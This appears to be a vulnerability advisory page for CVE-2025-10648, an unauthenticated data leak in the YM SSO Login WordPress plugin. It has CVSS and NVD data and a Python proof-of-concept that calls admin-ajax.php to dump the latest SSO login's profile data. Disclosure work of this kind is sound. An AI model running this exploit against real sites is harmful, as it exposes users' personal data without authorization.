Security Vulnerability Report
中文
CVE-2025-10648 CVSS 5.3 MEDIUM

CVE-2025-10648

Published: 2025-10-15 09:15:41
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The YourMembership Single Sign On – YM SSO Login plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'moym_display_test_attributes' function in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to read the profile data of the latest SSO login.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

YourMembership Single Sign On – YM SSO Login <= 1.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10648 PoC # Vulnerability: Missing capability check in 'moym_display_test_attributes' function # Affected: YM SSO Login plugin <= 1.1.7 # Impact: Unauthenticated read of latest SSO login profile data import requests # Target WordPress site URL TARGET_URL = "http://target-wordpress-site.com" # WordPress AJAX endpoint for unauthenticated action invocation # The 'moym_display_test_attributes' function lacks capability check, # allowing any unauthenticated attacker to invoke it. ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Payload: action parameter triggers the vulnerable function payload = { "action": "moym_display_test_attributes" } # Send the exploit request (no authentication required) response = requests.post(ajax_url, data=payload) # The server will return the profile attributes of the latest SSO login if response.status_code == 200: print("[+] Exploit successful!") print("[+] Leaked SSO profile data:") print(response.text) else: print(f"[-] Exploit failed. Status code: {response.status_code}") # Alternative: GET request also works in many cases response_get = requests.get(ajax_url, params=payload) if response_get.status_code == 200 and response_get.text: print("\n[+] GET request also returned data:") print(response_get.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10648", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:40.953", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YourMembership Single Sign On – YM SSO Login plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'moym_display_test_attributes' function in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to read the profile data of the latest SSO login."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/login-with-yourmembership/trunk/class-moym-sso.php#L112", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/login-with-yourmembership/trunk/class-moym-sso.php#L88", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3389623/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1bb25412-8f63-4a9d-84bd-44fac59c6eed?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.